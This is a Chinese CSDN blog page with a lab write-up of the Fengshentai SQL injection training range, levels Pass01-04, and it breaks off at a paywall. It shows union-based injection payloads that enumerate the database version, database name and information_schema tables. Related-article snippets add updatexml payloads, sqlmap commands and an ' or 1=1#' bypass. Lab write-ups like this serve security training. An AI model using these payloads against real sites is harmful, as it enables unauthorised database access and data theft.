封神台靶场 | 显错注入 | Pass01-04

最新推荐文章于 2021-04-23 23:17:03 发布
最新推荐文章于 2021-04-23 23:17:03 发布
阅读量926 收藏 2
点赞数 2
分类专栏: 封神台靶场 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fanny0602/article/details/114368167
版权

封神台靶场 | 显错注入

题目地址: 掌控安全学院SQL注入靶场

文章目录

      Pass01
         MYSQL补充知识点
         查询所需数据
         查询user表中的内容
      Pass02
      Pass03
      Pass04

任务
通过显错注入获得flag。
对该页面进行GET传参,传参名为id

Pass01

数据库查询语句:

 select * from user where id=1

查询该列数据:表示该列只有3条对应的数据

id=1,id=2,id=3:正确
id=4:No results found(报错)

查询字段数:表示该表只有三列字段

order by 1,order by 2, order by 3 :正确
order by 4 :No results found(报错)

查询数据库版本和当前使用的数据库 :
当前使用的数据库版本:5.6.47 ;
当前使用的数据库:error

id=1 and 1=2 : No results found(报错)
id=1 and 1=2 union select 1, version(),database()
MYSQL补充知识点:
  • UNION
    MySQL UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。(来源:菜鸟教程)
  • LIMIT
    select columnName from tableName limit 0,1
    即是指从表中从第0行开始取数据,取1行。
  • information_schema 库
    在MYSQL中,information_schema 存放着mysql的系统信息。简单介绍一下下面会用到的几个表。
    • SCHEMATA:存放MYSQL中所有的数据库名。
    • TABLES:存放MYSQL中所有的表名,xx库下都有xx表。
    • COLUMNS:存放MYSQL中所有的列名,xx库下的xx表都有xx列。

查询所需数据:
  • error库下的数据表: error_flag 、 user
id=1  and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=
最低0.47元/天 解锁文章
N0mo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1520
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
神台SQL注入-盲注
qq_40941912的博客
10-05 777
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔型盲注 => 通过GET/_GET/G​ET/_POST传参获取后台数据库内容,并且可以通过URL栏/登录框进行SQL代码注入的 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 二、作业 (一) SQ
神台SQL注入-显错注入
qq_40941912的博客
08-23 1434
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 [注: information_schema.tables
SQL注入盲注利用方法
小白渣的博客
02-27 1895
靠 真大佬写的 太太太qiang 辽 !!! 前言 最近做了些基于布尔盲注和基于时间盲注的CTF题,掌握了CTF题中SQL盲注的三种解法,收获很大,于是结合题目分享一下。 BASE-Blind-Inject 题目信息 题干分析 第一次走进误区,刚看到这道题的时候看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入 " or 1=1# 果...
Webug4.0显错注入
AmyBaby00的博客
01-23 240
进入页面,输入单引在id=1后面加单引号页面报错。 构造查询语句1’ or 1=1%23页面正常显示。 利用order by 语句判断字段数。由1开始输入,输入3时报错,因此判断字段个数是两个。 利用version()语句获得当前数据库版本5.5.53 查询数据库名称 查看webug数据库中的内容。 查看flag表中的内容。 查看flag列中的内容。 得到flag中数据。 ...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
神演义--------------------.pdf
03-27
神演义
ZVuldrill 黑客靶场 附带安装教程
01-26
1. **SQL注入**:SQL注入是通过输入恶意SQL代码,以欺骗数据库服务器执行非授权操作的一种攻击方式。学习者需要理解如何识别和利用这种漏洞,同时掌握预防措施,如使用预编译的SQL语句、限制用户输入的长度和类型等...
webug4.0—显错注入
Stephen Wolf
01-09 370
所用到一些知识: 1. concat(str1,str2,...) 返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符地连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)  连接一个组的所有字符串,...
SQL注入总结
weixin_45540609的博客
04-23 493
一、本质 原理:用户输入数据被当做SQL代码执行。 条件:用户能控制输入;原本程序要执行的代码拼接了用户数据然后执行。 判断: 1、and 1=1 页面正常 and 1=2 页面不正常 ps:and 1=1,and 1=2被拦截的可能性高,可以尝试and -1=-1,and -1=-2,and 1>0,or 1=1,或者直接or sleep(5) 2、页面后面加 ' ,看是否报错 3、数字型传参尝试-1 id=1和id=2-1都显示id=1的页面 ...
SQL注入显错注入
秋水的博客
08-30 3680
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
显错注入(一)
qq_45300786的博客
06-24 2787
显错注入(一) 注入环境: http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用神台免费靶场。可以从下面链接进入:https://hack.
一次简单的纯手工显错注入
qq_42097777的博客
03-29 590
# 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 **注:这里还要利用到了一个函数group_concat( ),意思是将查询的结果并排 拼接一起展示,不然输出点只能显示一个表名或者字段 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点 2。order by 语句查询有几个字段,为了后面使用联合查询 例如,order by 4 出错,...
Webug4.0-SQL注入
baynk的博客
11-26 461
0x00 SQL注入 熟悉的感觉,熟悉的配方,还是原来的味道 0x01 显错注入 打的时候吓一跳。。原来就是个本地的,给自己打广告不好吗。。。 输入'以后就直接报错了,然后就一翻操作。 库 1' and updatexml(1,concat(0x7e,database(),0x7e),1) %23 表 1' and updatexml(1,concat(0x7e,(select group_...
利用sqlmap注入获取flag
weixin_43910033的博客
01-21 4500
准备注入网址:http://192.168.129.129:8079 (需要自己搭建) 注入点:id 1.注入语句: python sqlmap.py -u "http://192.168.129.129:8079/?id=1" 2.得到数据库是MySQL,进一步获取数据库信息。 python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs 3.得到可用的数据库,查询数据库里面的表以获取表信息 python sqlmap.py -u "
神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1386
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
ctf实战 掌控安全的靶场 第一关通关记录
wh1te 小白的博客
09-17 5812
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值